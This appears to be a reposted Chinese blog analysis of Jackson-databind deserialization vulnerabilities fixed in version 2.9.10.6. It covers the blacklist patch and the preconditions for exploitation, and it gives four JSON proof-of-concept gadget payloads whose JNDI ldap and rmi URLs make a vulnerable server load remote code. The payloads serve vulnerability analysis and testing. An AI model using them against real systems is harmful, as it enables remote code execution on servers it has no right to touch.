Jackson反序列化漏洞:2.9.10.6版本以前

Jackson反序列化漏洞:2.9.10.6版本以前

黑客资讯访客1970-01-01 8:00:003244A+A-

引言

今天又看到有一些安全预警平台爆出的 Jackson 反序列漏洞,要求把 Jackson 升级到 2.9.10.6,所以在下面对漏洞原理和适用范围做一下分析,并给出 poc。

补丁分析

补丁特别简单,也如同漏洞公告一样,增加了几处黑名单。1598517116.jpg!small

POC 构造

br.com.anteros.dbcp.AnterosDBCPDataSource

先看一下该 jar 包的 maven 引用次数,

1598517195.jpg!small

再构造 poc(原理简单,不做细节描述),

["br.com.anteros.dbcp.AnterosDBCPDataSource", {"metricRegistry":"ldap://ytcrpi.ceye.io:1399/test"}]

com.pastdev.httpcomponents.configuration.JndiConfiguration

先看一下该 jar 包的 maven 引用次数,

1598517337.jpg!small

再构造 poc(原理简单,不做细节描述),

["com.pastdev.httpcomponents.configuration.JndiConfiguration", "ldap://gggg.ytcrpi.ceye.io:1399/test"]

com.nqadmin.rowset.JdbcRowSetImpl

先看一下该 jar 包的 maven 引用次数,

1598517400.jpg!small

再构造 poc(原理简单,不做细节描述),

["com.nqadmin.rowset.JdbcRowSetImpl",{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}]

org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl

先看一下该 jar 包的 maven 引用次数,

1598517461.jpg!small

再构造 poc(原理简单,不做细节描述),

["org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl",{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}]

注意:这一条 poc 实际上是不可用的,其原因在于该类中因为存在重名函数导致的 jackson 在反序列化的时候会报同名函数冲突。这是一个原理层面可用,实际不可用的 poc。

总结

1. 利用成功需要开启 enableDefaultTyping。(Jackson 早已经默认关闭)

2. Gadget 的 jar 极其罕见。

结论:基本没什么用,不必大惊小怪,不放心请用 poc 自行去测试。

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 4条评论
  • 听弧缪败2022-06-03 11:29:22
  • 。补丁分析补丁特别简单,也如同漏洞公告一样,增加了几处黑名单。POC 构造br.com.anteros.dbcp.AnterosDBCPDataSource先看一下该 jar
  • 萌懂长野2022-06-03 11:30:02
  • 引言今天又看到有一些安全预警平台爆出的 Jackson 反序列漏洞,要求把 Jackson 升级到 2.9.10.6,所以在下面对漏洞原理和适用范围做一下分析,并给出 poc。补丁分析补丁特别简单,也如同漏洞
  • 澄萌离祭2022-06-03 06:15:38
  • 引言今天又看到有一些安全预警平台爆出的 Jackson 反序列漏洞,要求把 Jackson 升级到 2.9.10.6,所以在下面对漏洞原理和适用范围做一下分析,并给出 poc。补丁分析补丁特
  • 瑰颈尝蛊2022-06-03 11:44:35
  • wset.JdbcRowSetImpl先看一下该 jar 包的 maven 引用次数,再构造 poc(原理简单,不做细节描述),["com.nqadmin.rowset.JdbcRowSetImpl",{"dataSourceName":"rmi://localh

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理